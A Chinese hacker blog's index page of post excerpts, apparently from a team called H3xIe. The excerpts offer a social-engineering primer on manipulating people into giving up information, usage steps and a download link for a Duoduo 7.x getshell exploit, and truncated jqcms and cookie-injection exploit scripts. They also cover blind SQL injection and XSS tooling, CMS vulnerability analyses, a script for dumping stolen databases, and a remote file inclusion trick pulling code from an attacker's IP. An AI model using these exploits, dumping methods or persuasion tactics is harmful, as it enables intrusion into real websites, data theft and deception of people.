摘要: 版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://h4ck3r.blogbus.com/logs/108844040.html社会工程学最直接的称呼是社交工程,攻击者可以在利用黑客经验的基础上,组织大量的专业知识对信息拥有者进行说服,最终达到信息窃取的目的。 然而我们在面对不同性格的信息拥有者时需要采取不同的信息获取策略。正因为社会工程学攻击是建立在人的概念上,人为的漏洞相比计算机漏洞更容易被我们利用,所以我们需要跟人沟通快速建立好感从而获取信任,那如果想和别人更好的沟通就要首先去了解别人的心理,只有你让别人觉得你是了解他的肯定他的才会给予你信任,然后对其采取恰当的 阅读全文
posted @ 2013-05-20 02:21 sdfsadfasfsd2012 阅读(520) 评论(0) 推荐(0) 编辑
摘要: 登陆后台后, 通过抓包工具获取当前会话COOKIE, 再按照程序参数说明填写上抓取的COOKIE.中间过程中EXP程序提示登陆失败的语句, 那就说明你抓取COOKIE是无效的.这时你就要注意下, 你的COOKIE是否填写正确.细节如下所示.你用抓包工具抓到的HTTP返回头信息COOKIE部分可能如下:PHPSESSID={cookie}将{cookie}的字符串部分拷贝出来, 才是适合EXP程序的读取COOKIE.Duoduo7.x_getshell.php http://files.cnblogs.com/xiaosan/Duoduo7.x_getshell.php.zip 阅读全文
posted @ 2012-09-09 14:37 sdfsadfasfsd2012 阅读(907) 评论(0) 推荐(0) 编辑
摘要: 以下这张图片, 是一位朋友测试星外的结果, 本以为会出现问题, 但是他成功了. 在我自己测试的一些环境中(包括星外), 遇到了非常多的问题, 也有解决的也有没解决. 这个测试程序原理很简单, 加载自己的DLL调用其中的函数列IIS. 测试时, 将IISLoader.exe和另外它依赖的两个文件(activeds.tlb,activeds.dll) 上传到测试机器里。执行时一定要带上参数"local"(C:\xxxx.exe local), 要不然会恶作剧的输出 "Exploit Fail!", 如果读取成功后,就会像下面图片的结果一样把IIS用去全部给列 阅读全文
posted @ 2012-06-25 21:32 sdfsadfasfsd2012 阅读(1347) 评论(0) 推荐(0) 编辑
摘要: 环境要求: register_globals = On.<?php /* * Date : 2012/4/24 * Team : H3xIe Security TeAm 2005 - 2012 * This exploit script is jqcms, It requires administrative privileges can. * * Welcome to We team WebSite. * <http://www.hkmjj.com/> */ ini_set('display_errors', 0); set_time_li... 阅读全文
posted @ 2012-04-25 06:31 sdfsadfasfsd2012 阅读(1533) 评论(0) 推荐(0) 编辑
摘要: <?php /*######################################################################### * / * * - >> SchramCookie Inject ver 1.0 * C0de by Nig3h -Greetz To All H3xIe Member. * link : xiaosan.cnblogs.com * ex : http://host/?url={$argv... 阅读全文
posted @ 2011-11-07 14:40 sdfsadfasfsd2012 阅读(939) 评论(0) 推荐(0) 编辑
摘要: Includes 1 GB of trafficAccess to Free serversLimited availability with possible waiting timesForced disconnection after 6 hours (redial possible)Bandwidth limited to 2 Mbpshttp://cyberghostvpn.com/en/product/purchase.html 阅读全文
posted @ 2011-11-06 19:17 sdfsadfasfsd2012 阅读(661) 评论(0) 推荐(0) 编辑
摘要: This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections.We reported bsqlbf when it first hit the net back in April 2006 with bsqlbf v1.1, then the v2.0 update in June 200 阅读全文
posted @ 2011-11-05 00:54 sdfsadfasfsd2012 阅读(839) 评论(0) 推荐(0) 编辑
摘要: The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, p 阅读全文
posted @ 2011-11-05 00:42 sdfsadfasfsd2012 阅读(842) 评论(0) 推荐(0) 编辑
摘要: Easily search for exploits in BackTrack's exploitdb (files.csv).Highlights:Search the exploitdb archive Case sensitive & insensitive Change output mode Automaticlly copy your exploits Requirements: python (tested with python 2.7.1 and 2.5.2) local exploitdb (pre-installed on BackTrack Linux) 阅读全文
posted @ 2011-10-03 22:05 sdfsadfasfsd2012 阅读(857) 评论(0) 推荐(0) 编辑
摘要: ##Author : HeXie S3curity TeAm#Date : 2011.10.01##FIle : /image.php<?php/**#########################################* PHPCMS File Manager* Copyright (c) 2004-2006 phpcms.cn* Author: Longbill ( http://www.longbill.cn )* longbill.cn@gmail.com*#########################################*/$path = $_GET 阅读全文
posted @ 2011-10-01 04:46 sdfsadfasfsd2012 阅读(748) 评论(0) 推荐(0) 编辑
摘要: 精迅CMS(Jxcms)是基于采用网络中已经成熟、稳定的技术PHP+MYSQL开发而成,利用本系统您可以很方便地管理自己的网站。本系统是一款由文章模型、采集管理、广告系统、会员中心、友情链接、公告、单网页、数据备份还原等多个强大功能模块组合而成的强大、易用、扩展性强的开源网站管理软件。我们以精益求精的态度,追求卓越品质,为中小网站用户提供一套完美的迅速建站解决方案,我们在开发过程中无处不充分考虑用户的使用习惯,尽最大可能降低用户的使用门槛,让用户关注于内容维护本身,而不需要投入过多的时间来学习系统的使用技巧,在细节处下大工夫。Jxcms目前只有一个文章模型,但已有的功能模块都努力做到精益求.. 阅读全文
posted @ 2011-09-28 05:14 sdfsadfasfsd2012 阅读(741) 评论(0) 推荐(0) 编辑
摘要: Author -> hExi3 Security TeAmTestEd On : IIS6.0+2k3分析过程 :\e\class\functions.php 2609行 ReUserjs 函数.function ReUserjs($jsr,$addpath){ global $empire,$public_r; DoFileMkDir($addpath.$jsr['jsfilename']);//建目录 //取得js模板 $jstemptext=GetTheJstemp($jsr[jstempid]); //取出设置Js数组 $ret_r=ReturnReplaceLi 阅读全文
posted @ 2011-09-04 01:35 sdfsadfasfsd2012 阅读(3304) 评论(0) 推荐(0) 编辑
摘要: 这个重新写的一个MYSQL数据导出脚本, 导出格式为CSV,这种格式更加的轻便,不会过份影响数据文件体积,适合导入到本地数据库!大家通过修改代码里面标注的一些配置变量就可以了。如果导出数据有筛选要求可以直接修改SQL语句满足你的要求!脚本运行提醒:如果数据是百万级别,这个脚本并不适合通过浏览器访问来脱裤,所以要用命令行来运行该脚本,这样就不会漏数据了。(记得网上广传的adminer 脚本,这个导出大量数据时会不完整,十分不稳定!只适合浏览数据和修改。)运行方式:linux 下可以 :php /tmp/outdata.php (在未安装PHP 环境中,需要单独去安装一下PHP。)问题总结:--- 阅读全文
posted @ 2011-06-03 07:44 sdfsadfasfsd2012 阅读(77299) 评论(4) 推荐(1) 编辑
摘要: SESSION和COOKIE不同,COOKIE是存放在客户端的文件,而SESSION是存放在服务器上,同时也增强了安全性。如果一个 WEBSHELL的验证方式是SESSION,我们可以通过它检测出服务器的木马。 我的环境是IIS+PHP,在PHP.ini中,有这么个选项,session.gc_maxlifetime = 1440,也就是SESSION默 认到期的时间是24小时,如果客户端没做出反应,24小时后session文件就删除了,即使在客户端关闭了浏览器,它的session文件依然存在于 服务器上,php.ini中设置存放路径是session.save_path = "C:\W 阅读全文
posted @ 2011-06-03 02:19 sdfsadfasfsd2012 阅读(3045) 评论(0) 推荐(0) 编辑
摘要: 建一个php文件,内容: <? include $path."config/config.inc.php" ?> 当前目录下建一个config文件夹,再在文件夹内建config.inc.php,就可以了。 访问http://xxx/xx.php?x=file:///\\ip\x$\xx\xyz xyz就是config文件夹所在的路径by: 乱雪 阅读全文
posted @ 2011-06-03 01:52 sdfsadfasfsd2012 阅读(1983) 评论(0) 推荐(0) 编辑
摘要: 百度博客和博客园,都有自己的特色。不过相对而言,更喜欢博客园!强大语法高亮及技术专区,非常的赞!^-^ 阅读全文
posted @ 2011-06-01 09:07 sdfsadfasfsd2012 阅读(1901) 评论(1) 推荐(0) 编辑






郊外景色

小桥流水人家

牵手

风车

采花姑娘

农村乐趣

在希望的田野上

丝袜和秀腿

张曼玉